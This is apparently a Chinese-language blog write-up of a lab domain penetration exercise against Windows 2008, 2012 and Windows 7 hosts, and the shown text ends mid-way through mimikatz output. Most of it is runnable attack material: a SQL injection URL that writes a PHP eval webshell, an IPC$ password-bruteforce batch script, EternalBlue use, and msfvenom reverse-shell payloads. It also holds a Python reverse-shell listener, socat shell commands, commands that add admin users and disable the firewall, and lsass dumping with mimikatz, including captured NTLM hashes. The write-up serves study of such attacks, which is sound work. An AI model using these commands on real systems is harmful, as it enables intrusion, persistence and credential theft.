image-20210321215834378

过自己想要的生活,上帝会让你付出代价,但最后,这个完整的自己,就是上帝还给你的利息。不如就稍微地学以致用把老师给的环境玩意过一遍?

渗透 - 还行的域渗透


一、目标配置(假装在内网):

- 攻击机:

  • KALI(msf6):172.16.243.100
  • WIN7:172.16.243.101
  • KALI(msf5):172.16.243.102

- 靶机:

  • WIN7:172.16.243.223
  • WIN2008:172.16.243.222 (入口机)
  • WIN12:172.16.243.221

二、具体步骤:

* WIN2008(172.16.243.222):

- getshell:

还是先进行最基本的 端口扫描 趴,

nmap -O -A -sV -p- 172.16.243.222

得到结果:

┌──(root💀kali)-[~/Desktop]
└─# nmap -O -A -sV -p- 172.16.243.222                                                                        130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 20:08 EST
Nmap scan report for 172.16.243.222
Host is up (0.00066s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http         Apache httpd 2.4.10 ((Win32) OpenSSL/0.9.8zb PHP/5.3.29)
|_http-generator: FreeMind-XSL Stylesheet (see: http://freemind-xsl.dev.slash-me.net/ for details)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29
|_http-title: SQL Injections
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-05 01:10:07Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: pentest.com, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: PENTEST)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: pentest.com, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
9389/tcp  open  mc-nmf       .NET Message Framing
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49168/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:78:9E:96 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Service Info: Host: WIN-QJ9CO8DHNTS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: WIN-QJ9CO8DHNTS, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:78:9e:96 (VMware)
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 (Windows Server 2008 R2 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WIN-QJ9CO8DHNTS
|   NetBIOS computer name: WIN-QJ9CO8DHNTS\x00
|   Domain name: pentest.com
|   Forest name: pentest.com
|   FQDN: WIN-QJ9CO8DHNTS.pentest.com
|_  System time: 2021-03-05T09:10:58+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-03-05T01:10:59
|_  start_date: 2020-10-20T10:07:05

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 172.16.243.222

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.78 seconds

可以看到开了不少的端口,其中 80135/139445 不妨先从 webIPC(太怪了) 或者 SMB 入手?

- sql注入获取 webshell:

这里先从 80 端口入手吧,打开一看竟然会是 sqli-lib

image-20210305111513725

众所周知,这是一个 windows 的服务器,在 mysql 的版本小于等于 5.7.16 时默认是 的,即写入文件是无限制的。那么列一下 常见默认路径 趴:

常见默认路径

  • winserveriis 默认路径 C:\Inetpub\wwwroot
  • linux
    • nginx 一般是 /usr/local/nginx/html,**/home/wwwroot/default/usr/share/nginx/var/www/html**等:
    • apache 一般是 /var/www/html,**/var/www/html/htdocs**
  • phpstudy 一般是 \PhpStudy[版本号]]\PHPTutorial\WWW
  • xammp 一般是 \xampp\htdocs

然后从第 1 关通过回显注入来查看 version()@@secure_file_priv@@basedir 以及 @@datadir 来分别对应查看 数据库版本可写文件目录mysql安装路径 以及 mysql数据库文件路径

  • 查看 数据库版本可写文件目录

    172.16.243.222/Less-1/?id=-1' union select 1,version(),@@secure_file_priv;%23

    image-20210305092708700

显而易见,数据库版本为 5.5.40 是 xxxx的,因而 @@secure_file_priv 是为 ,即写入文件无限制。

  • 查看 mysql安装路径mysql数据库文件路径

    http://172.16.243.222/Less-1/?id=-1%27%20union%20select%201,@@basedir,@@datadir;%23

    image-20210305092915540

emmm,居然是 phpstudy , 然后 mysql安装路径myql数据库文件路径 就得到了,那么该是拿 webshell 趴。

这个就比较简单了,直接写入 webshell 文件即可。不过现在并不知道当前页面的 本地路径 是啥,好在这个靶机是存在 phpinfo.php 的,可以直接通过这个页面查看当前 本地路径

image-20210305113041316

显然,路径为 C:/WWW/phpinfo.php 了,那么来到第 7 关,把 [一句话] 写进去趴。

http://172.16.243.222/Less-7/?id=1%27))%20union%20select%201,2,%22%3C?php%20eval($_REQUEST[%27dm%27]);?%3E%22%20into%20outfile%20%27C:/WWW/dm.php%27;%23

顺带说一下关于 into outfileinto dumpfile 的却别吧:

  • into outfile

  • into dumpfile

  • 官方文档 - mysql-5.7 - 2148页(2178)

    • SELECT … INTO OUTFILE writes the selected rows to a file. Column and line terminators can be specified to produce a specific output format.

    • SELECT … INTO DUMPFILE writes a single row to a file without any formatting.

    • 使用 outfile 方法来导出文件可以支持导出多行,且可以自定义格式,同时形如 ‘\n’ 这样的特殊字符会被被转义,
    • 使用 dumpfile 方法来导出文件只能导出一行的内容(trick:应该是两行),不会有任何格式化,特殊字符不会被转义(这也是为啥udf提权要用dumpfile写入文件)。

emmm,之后验证一下,是OK的:

image-20210305113231433

- $IPC getshell:

毕竟扫描到了 135139 端口了嘛,试试看吧。

先简单看一下有无匿名共享:

image-20210305140237129

emmm,看起来并不可行,可以试试对用户进行简单的爆破:

@echo off
set /p ip="需要爆破的IP:"
set /p dictName="字典文件路径:"
set /p userName="用户名:"
for /f "delims=" %%e in (%dictName%) do (
	net use \\%ip%\ipc$ "%%e" /user:"%userName%" >nul 2>nul 
		if not errorlevel 1 ( 
			echo Success: %ip% %userName%:%%e
        	net use \\%ip%\ipc$ /del
            goto end 
         )
         net use * /del /y >nul 2>nul 
     )
:end

不过爆破密码肯定是不太现实,直接跳过吧。

- 445永恒之蓝 getshell:

由于这玩意开了 445 ,可以用 msf 试试看:

image-20210305140940691

成功扫描到了靶机,并且得知靶机是存在 PENTEST 这个域中的。可以直接尝试用 payload 直接打一波吧:

image-20210305141433689

现在是拿到了 meterpreter 的反弹shell了。

- 升级到 msf 反弹 meterptershell(从webshell):

这里有两种方式进行 msf 反弹 shell 吧。

  • 第一种,蚁剑 + msf木马

    首先用 msf 生成对应的木马:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.243.100 LPORT=3367 -f exe -o /tmp/re.exe

    image-20210305130804889

    然后使用 蚁剑 连接 webshell 后将其上传:

    image-20210305131709450

    然后使用 msf 监听:

    image-20210305131949892

    蚁剑 运行一下木马,这时候就拿到了 msfmeterpreter 反弹shell了:

    image-20210305132058831

  • 第二种,甜甜圈联动msf

    那么,话不多说先把 甜甜圈 给装了吧:

    image-20210305133002560

    然后简单连接:

    image-20210305133053715

    msf 监听关于 php 的反弹shell:

    image-20210305133429686

    使用 甜甜圈 联动,拿到 msfmeterpreter 反弹shell:

    image-20210305133619923

- 权限提升:

emmm,这个免了吧,这windows靶机对权限管控不太严:

image-20210305142640540

不妨先 迁徙 到别的进程中:

image-20210305152221456

看起来是可以了:

image-20210305152237445

那么可以先添加一个用户,

net user dq Qwe123!!! /add
net localgroup administrators dq /add

image-20210305150418871

这里得注意的是,这个添加的 dq 用户是属于 PENTEST 域的,实际上就是本地趴:

image-20210305151142614

- 抓密码:

之后不妨抓一下密码?

image-20210305153326025

emmm,然后就能得到 administrator 的密码了。

- 内网初步扫描

- 当前靶机网络配置:

可以先简单地使用 ipconfig /all 命令去查一下:

image-20210305143714711

这里得到当前机子的主机名为 WIN-QJ9C08DHNTS ,域名为 pentest.com ,处在 172.16.243.0/24 网段。

然后再查看一下当前用户:

image-20210306134342224

查看当前有几个域:

image-20210306134554558

查看同域机器:

image-20210306135343010

查看当前的域时间:

image-20210306135612825

显然当前 主域 的域名即是 pentest.com 了,再结合上边得到的域名,可知当前域为 PENTEST 。那么可以先看一下当前域,也就是 PENTEST 域下的用户:

image-20210306140736963

得到了几个用户,不妨看一下 域管理员本地管理员

image-20210306141127304

因此得到信息:

  • 域管理员:Administrator
  • 本地管理员:08、Administrator、Domain Admins、dq、Enterprise Admins、lijun、liming

然后在上边抓密码已经是能得到 域管理员 的密码,也就是说现在已经任意可以进入域里边的其他机子了(前提是其他机子开启远程桌面)。

再查看一下 域控

image-20210306141321175

OK,当前 WIN2008 即是 域控 了,也就是说现在已经拿下一个 域控 了,这里可以给 WIN2008 多添加一个 域管理员 用户,不过可能会比较明显,就先用 Administrator 这个用户好了。还有一个 DC2012 也是域控,不妨把它拿下。

- 模拟内网(挂代理):

由于这个环境是同在一个网段的,这里可以强行模拟成内网环境。即用 WIN2008 作为跳板开代理去攻击其他靶机:

image-20210305154424090

然后开 socks5 趴,毕竟这玩意是 msf6 可能?比较稳定了:

image-20210305155103701

- 常见端口扫描:

直接用 msf 进行扫描吧:

image-20210305145137055

简单的整理可以得到:

172.16.243.221	88,135,139,445
172.16.243.222	80,88,135,139,445
172.16.243.223	135,139,445

emmm由于都开了 445 ,不如用 smb服务扫描 来获取系统名称:

image-20210305165849939

得到以下信息:

  • 172.16.243.221:
    • 系统:Windows 2012 R2 Standard
    • 主机名:DC2012
    • 所在域:PENTEST
  • 172.16.243.222(自己):
    • 系统:Window 2008 R2 Enterprise SP1
    • 主机名:WIN-QJ9CO8DHNTS
    • 所在域:PENTEST
  • 172.16.243.223:
    • 系统:Windows 7 Ultimate
    • 主机名:WIN7PC
    • 所在域:PENTEST

OK,接下来是即是见招拆招,扫一下是否存在 永恒之蓝

image-20210306142210344

看起来似乎都是存在 永恒之蓝 的,不过其他机子也开启了一些如 135 139 这端口,可以简单尝试用 $IPC 试试。

- 远程登陆:

设置一下 代理链 吧:

vim /etc/proxychains4.conf

image-20210305155249824

然后尝试打开一下 远程桌面 试试看呗,直接上 msf 试试:

run post/windows/manage/enable_rdp

image-20210305145820782

直接连接就行了,当然这里就算不用 代理链 也是可以连的,毕竟 WIN2008 是外网机,这里只是测试一下 代理链 是否成功了:

image-20210305155634564

至此,就拿下 WIN2008 了。


* WIN2012(172.16.243.221):

- getshell:

首先这台机子从上边即可知道是开启了以下端口:

  • 88,135,139,445

不妨以 WIN2008 作为跳板,进行攻击。

相较于一般的 windows 反弹shell,大部分都是用 powershell 啥的,这里用 socat 来演示获取一个 WIN2008cmdshell 玩玩吧,首先到 (https://github.com/StudioEtrange/socat-windows) 去将 windows 的 socat 给下了,然后上传到 WIN2008 上:

image-20210306143756792

然后给 kali 简单写一个 python 脚本吧,

from socket import error, socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from termios import tcgetattr, tcsetattr, TCSADRAIN
from sys import stdin, stdout, version_info, argv
from tty import setraw
from os import path, system, _exit

# import thread, deal with byte
if (version_info.major == 2):
    def get_byte( s, encoding = "UTF-8" ):
        return str(bytearray(s, encoding))


    STDOUT = stdout
    import thread
else:
    def get_byte( s, encoding = "UTF-8" ):
        return bytes(s, encoding = encoding)


    STDOUT = stdout.buffer
    import _thread as thread

FD = None
OLD_SETTINGS = None


class _GetchUnix:
    def __call__( self ):
        global FD, OLD_SETTINGS
        FD = stdin.fileno( )
        OLD_SETTINGS = tcgetattr(FD)
        try:
            setraw(stdin.fileno( ))
            ch = stdin.read(1)
        finally:
            tcsetattr(FD, TCSADRAIN, OLD_SETTINGS)
        return ch


getch = _GetchUnix( )

CONN_ONLINE = 1


def stdprint( message ):
    stdout.write(message)
    stdout.flush( )


def close_socket( talk, exit_code = 0 ):
    global FD, OLD_SETTINGS, CONN_ONLINE
    CONN_ONLINE = 0
    talk.close( )
    try:
        tcsetattr(FD, TCSADRAIN, OLD_SETTINGS)
    except TypeError:
        pass
    system("reset")
    _exit(exit_code)


def recv_daemon( conn ):
    global CONN_ONLINE
    while CONN_ONLINE:
        try:
            tmp = conn.recv(16)
            if (tmp):
                STDOUT.write(tmp)
                stdout.flush( )
            else:
                raise error
        except error:
            msg = "Connection close by socket.\n"
            stdprint(msg)
            close_socket(conn, 1)


def main( port ):
    conn = socket(AF_INET, SOCK_STREAM)
    conn.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    conn.bind(('0.0.0.0', port))
    conn.listen(1)
    try:
        talk, addr = conn.accept( )
        stdprint("Connect from %s.\n" % addr[ 0 ])
        thread.start_new_thread(recv_daemon, (talk,))
        while CONN_ONLINE:
            c = getch( )
            if c:
                try:
                    talk.send(get_byte(c, encoding = 'utf-8'))
                except error:
                    break
    except KeyboardInterrupt:
        pass
        # stdprint("Connection close by KeyboardInterrupt.\n")
    finally:
        stdprint("Connection close...\n")
        close_socket(conn, 0)


if __name__ == "__main__":
    if (len(argv) < 2):
        print("usage:")
        print("      python %s [port]" % path.basename(argv[ 0 ]))
        exit(2)
    main(int(argv[ 1 ]))

先在 kali 上监听,再让 WIN2008 进行对接:

image-20210306150811799

或者用 WIN7攻击机 来用 socat 分别玩正向shell和反弹shell也是可以的。

  • 正向shell:

    WIN2008

    socat.exe tcp-l:3600,fork,reuseaddr exec:cmd,pty,stderr

    WIN7攻击机

    socat.exe - tcp:172.16.243.222:3600

    emmm,结果是失败的,似乎被 入站 给拦了。

  • 反向shell:

    WIN2008

    socat.exe tcp:172.16.243.101:3601 exec:cmd,pty,stderr

    WIN7攻击机

    socat.exe - tcp-l:3601

    这里是成功了:

    image-20210306155048055

当然用 powershell 的反弹shell也是可以的,之所以用反弹shell是因为一般来说 出站 规则会比 入站 规则宽松一些。

后边会再写一篇对关于 windows 的反弹shell进行一一复现的文章吧。

- $IPC getshell:

行,那么先进行简单的查看 匿名共享

image-20210306155342523

emmm,看起来并不可行,似乎得进行密码爆破,不过这里已经得到了 域管理员 不如就用这玩意去使用 $IPC 攻击吧。这里还是得先用 WIN2008 作为跳板才行,为了方便就直接上 远程桌面 趴,虽然说这样动静会非常的大。

image-20210306160517152

这里是成功使用 $IPCWIN2012C 盘映射回来了。现在是做法就蛮多了,可以上传一个 msf 木马,然后通过 WIN2008 设置的 autoroute 作为跳板来攻击 WIN2012 ;或者直接从 $IPC 入手,尝试打开 telnet 啥的。

  • 第一种,使用 定时任务 + msf木马

    还是先生成 msf木马 吧:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.243.222 LPORT=3345 -f exe > 2012.exe

    image-20210306161950304

    然后将 msf木马 传到 WIN2012 目录里边:

    image-20210306162316304

    使用 msf 开启监听:

    结果没成功:

    image-20210306163112144

    定时任务似乎是不被允许的。

  • 第二种,尝试打开 telnet

    这里先尝试使用 opentelnet 进行攻击试试:

    image-20210306163517442

    然后尝试开启 WIN2012telnet

    image-20210306163741383

    看起来似乎是成功了,直接用代理链尝试连接:

    image-20210306164114360

    emmm看起来并没有成功开启,试试别的命令。

    image-20210306165053848

    看起来 telnet 并没有装?那暂时先算了。

  • 第三种,使用及其麻烦的 socat ?:

    emmm既然定时任务不被允许,那这个麻烦的方法也是不太行了。

那么现在用 $IPC 能做的只有 任意读写 了。

- 445永恒之蓝 getshell:

话不多说直接上 msf 吧,

image-20210306170050089

没成功,换另一个试试:

image-20210306170318778

成功执行命令了。不如直接运行刚刚从 $IPC 那儿传入的 2012.exe 趴。很奇怪的是一直不成功,只要一执行 C:\temp\2012.exe 对于 WIN2008meterprefershell 的会话就会结束。。那就执行开启 远程桌面 的命令吧。

直接执行开启 远程桌面 的命令趴:

image-20210306180848706

emmm,结果失败了。

image-20210306181739128

不妨将开启 远程桌面 的代码写入 .bat 文件中然后用 $IPC 传到 WIN2012 ,命令就运行文件好了。

但依然还是失败了。

image-20210306182609675

看起来只能使用最后一招了, 永恒之蓝 + socat 超麻烦组合。

image-20210306183330455

然后来个反向shell吧:

  • WIN2012:

    socat.exe tcp:172.16.243.222:3601 exec:cmd,pty,stderr
  • WIN2008:

    socat.exe - tcp-l:3601

emmmm,结果还是失败了。。

image-20210306183846846

那么,就使用最后一招吧。将其变为 可执行程序 ,也就是另起一个 进程 试试:

image-20210306184145892

路径写错了。。。改变一下位置吧:

image-20210306184548508

然后 监听 + 命令执行

image-20210306184829300

好吧,还是失败了。试试正向shell吧:

  • WIN2012:

    socat.exe tcp-l:3600,fork,reuseaddr exec:cmd,pty,stderr
  • WIN2008:

    socat.exe tcp:172.16.243.221:3600

然后继续操作。

image-20210306185553352

emmmm,还是失败了。怀疑是 WIN2008 的某种规则吧,大概。

不过现在能拥有的有 任意文件增删读写部分命令执行 了,不妨先拿下 WIN7 然后再用 WIN7 作为跳板去试试看。

靠!!! 原因是 msf6 不太稳定,葛学姐救我,tql。

转战阵地,换了个 kali2019 用了 msf5 再次尝试:

image-20210307132352022

然后 msfWIN2008 做跳板进行监听:

image-20210307132522730

之后再运行命令趴:

image-20210307132737841

emmmm,还是没成功。不过还好的是 WIN2008meterpretershell 是没断开了。(后来进去了发现 WIN2012 的防火墙是开着的。。。好吧)

后来特么的发现 WIN2008 也是有防火墙的,靠!

> 获取 cmdshell

使用简单命令把 WIN2008 的防火墙关了:

netsh advfirewall set allprofiles state off

image-20210307140556821

于是 socat 成功拿到简单的 cmdshell 了:

image-20210307140510255

尝试添加新用户,发现即便 WIN2012 是个域控,似乎由于种种原因并不能够成功添加:

image-20210307141653653

> 获取 meterpretershell

不妨再尝试运行 msf木马 试试看。

换个端口吧:

image-20210307142142347

之后是上传:

image-20210307142332435

监听,然后使用 永恒之蓝 进行命令执行 msf木马

image-20210307142542032

靠,终于成功了,气死我啦。

- 权限提升:

先看一下当前用户权限趴:

image-20210307142728825

还不错,然后是 迁徙

image-20210307142822394

尝试进行 创建用户 试试:

image-20210307142938587

好吧,并不可行,不过咱们都有 域管理员 用户了,其实能否创建也无伤大雅,大不了在 WIN2008 这个 域控 上新建一个 DQV5域管理员 用户,嘿嘿嘿。

- 抓密码:

image-20210307151214234

呃,似乎不太行。尝试换另一种方式吧:

image-20210307151520603

emmm直接炸。

- 远程登陆:

可以先用这个 cmdshell 直接尝试打开 远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20210307141449700

连接试试,emmmm并没有成功:

image-20210307141038221

毕竟 WIN2012 还有个防火墙嘛。那就去关闭呗:

image-20210307143505901

也可以用 meterpretershell 打开 远程桌面 试试:

image-20210307143150388

看起来是打开了,然后别忘了关闭 防火墙

image-20210307143254600

尝试连接 远程桌面 ,结果并不可行,

image-20210307150727494

应该是设置了 仅允许网络级别身份验证 连接吧,不如试试 远程桌面套娃

image-20210307144018733

emmmm,成功了!!! 不过 域管理员 密码提示是过期的,不如就在 WIN2008 再新建一个新的 域管理员 用户趴:

image-20210307144315864

那么,添加 域管理员

再次尝试使用 远程桌面套娃

image-20210307145424908

emmm,结果并没有成功,很是奇怪。似乎得进行重启。。不过动静有点大,还是把现有用户加成 域管理员 吧(幸运的李明):

image-20210307150026961

然后尝试一下 远程桌面套娃

image-20210307150135848

好吧,成功了。。。恭喜李明助我成功。

image-20210307150246427

- 继续抓密码:

那么不妨上传 mimikatz 的二进制文件试试(李明超强):

image-20210307151651176

记得把李明放进 管理员组

image-20210307152010059

不过运行效果其实还是一样的,没抓到 明文密码

image-20210307152703580

不如直接用 ProcDumplsass.dmp 搞出来,然后再用 mimikatz 本地获取内容:

procdump.exe -accepteula -ma lsass.exe .\lsass.dmp

image-20210307153121548

然后试试:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" > password.txt

image-20210307160155763

得到的结果:


  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 2383976 (00000000:00246068)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2021/3/7 15:01:04
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : DC2012$
	 * Domain   : pentest.com
	 * Password : d0 2a b2 b4 e8 73 96 b5 21 51 af 1d a3 38 d3 a9 47 f4 70 bd 6b 5b 92 e6 f7 98 f5 1a b5 13 c7 d3 2d 31 52 3b c9 a7 2b 67 3f 9c 3d 87 8d 96 d5 a9 e2 75 4d 81 35 82 11 83 c2 68 37 c2 78 c3 7f de 93 01 6c 8e 55 b3 c0 51 8d 5b 2d ee 31 81 65 9c 76 f3 19 3e a8 68 d2 e4 9d 4e 98 8c 12 20 68 a3 b5 2e 1c 04 f1 79 5f 44 99 a8 fc 16 6c 25 9c 46 5b 54 53 d8 3e a4 5c cd ac 50 f9 1e 2c 66 6e a6 25 33 7f a1 db b8 8e ce 6a eb 0f dc ed e1 bd e5 76 04 7d 5f 1e 0f ef a9 28 ff 7e af d2 75 be 61 dc 2d 5f e7 1c f6 c8 85 a6 47 0d df d3 90 68 07 4f 19 5a 2e 44 dd b9 23 e3 81 ec 89 37 73 62 3b 4d 63 12 c1 f5 ae 46 a8 a8 01 60 b3 42 fd d7 d9 b1 cd 93 00 b4 5a 8c 78 e2 a2 3e df b3 b2 52 98 b6 24 86 61 05 e6 fd 80 47 12 41 23 47 73 be c2 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 69968 (00000000:00011150)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:02
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : DC2012$
	 * Domain   : pentest.com
	 * Password : d0 2a b2 b4 e8 73 96 b5 21 51 af 1d a3 38 d3 a9 47 f4 70 bd 6b 5b 92 e6 f7 98 f5 1a b5 13 c7 d3 2d 31 52 3b c9 a7 2b 67 3f 9c 3d 87 8d 96 d5 a9 e2 75 4d 81 35 82 11 83 c2 68 37 c2 78 c3 7f de 93 01 6c 8e 55 b3 c0 51 8d 5b 2d ee 31 81 65 9c 76 f3 19 3e a8 68 d2 e4 9d 4e 98 8c 12 20 68 a3 b5 2e 1c 04 f1 79 5f 44 99 a8 fc 16 6c 25 9c 46 5b 54 53 d8 3e a4 5c cd ac 50 f9 1e 2c 66 6e a6 25 33 7f a1 db b8 8e ce 6a eb 0f dc ed e1 bd e5 76 04 7d 5f 1e 0f ef a9 28 ff 7e af d2 75 be 61 dc 2d 5f e7 1c f6 c8 85 a6 47 0d df d3 90 68 07 4f 19 5a 2e 44 dd b9 23 e3 81 ec 89 37 73 62 3b 4d 63 12 c1 f5 ae 46 a8 a8 01 60 b3 42 fd d7 d9 b1 cd 93 00 b4 5a 8c 78 e2 a2 3e df b3 b2 52 98 b6 24 86 61 05 e6 fd 80 47 12 41 23 47 73 be c2 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 69326 (00000000:00010ece)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:02
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : DC2012$
	 * Domain   : pentest.com
	 * Password : d0 2a b2 b4 e8 73 96 b5 21 51 af 1d a3 38 d3 a9 47 f4 70 bd 6b 5b 92 e6 f7 98 f5 1a b5 13 c7 d3 2d 31 52 3b c9 a7 2b 67 3f 9c 3d 87 8d 96 d5 a9 e2 75 4d 81 35 82 11 83 c2 68 37 c2 78 c3 7f de 93 01 6c 8e 55 b3 c0 51 8d 5b 2d ee 31 81 65 9c 76 f3 19 3e a8 68 d2 e4 9d 4e 98 8c 12 20 68 a3 b5 2e 1c 04 f1 79 5f 44 99 a8 fc 16 6c 25 9c 46 5b 54 53 d8 3e a4 5c cd ac 50 f9 1e 2c 66 6e a6 25 33 7f a1 db b8 8e ce 6a eb 0f dc ed e1 bd e5 76 04 7d 5f 1e 0f ef a9 28 ff 7e af d2 75 be 61 dc 2d 5f e7 1c f6 c8 85 a6 47 0d df d3 90 68 07 4f 19 5a 2e 44 dd b9 23 e3 81 ec 89 37 73 62 3b 4d 63 12 c1 f5 ae 46 a8 a8 01 60 b3 42 fd d7 d9 b1 cd 93 00 b4 5a 8c 78 e2 a2 3e df b3 b2 52 98 b6 24 86 61 05 e6 fd 80 47 12 41 23 47 73 be c2 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DC2012$
Domain            : PENTEST
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:02
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : dc2012$
	 * Domain   : pentest.com
	 * Password : d0 2a b2 b4 e8 73 96 b5 21 51 af 1d a3 38 d3 a9 47 f4 70 bd 6b 5b 92 e6 f7 98 f5 1a b5 13 c7 d3 2d 31 52 3b c9 a7 2b 67 3f 9c 3d 87 8d 96 d5 a9 e2 75 4d 81 35 82 11 83 c2 68 37 c2 78 c3 7f de 93 01 6c 8e 55 b3 c0 51 8d 5b 2d ee 31 81 65 9c 76 f3 19 3e a8 68 d2 e4 9d 4e 98 8c 12 20 68 a3 b5 2e 1c 04 f1 79 5f 44 99 a8 fc 16 6c 25 9c 46 5b 54 53 d8 3e a4 5c cd ac 50 f9 1e 2c 66 6e a6 25 33 7f a1 db b8 8e ce 6a eb 0f dc ed e1 bd e5 76 04 7d 5f 1e 0f ef a9 28 ff 7e af d2 75 be 61 dc 2d 5f e7 1c f6 c8 85 a6 47 0d df d3 90 68 07 4f 19 5a 2e 44 dd b9 23 e3 81 ec 89 37 73 62 3b 4d 63 12 c1 f5 ae 46 a8 a8 01 60 b3 42 fd d7 d9 b1 cd 93 00 b4 5a 8c 78 e2 a2 3e df b3 b2 52 98 b6 24 86 61 05 e6 fd 80 47 12 41 23 47 73 be c2 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 46276 (00000000:0000b4c4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:01
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
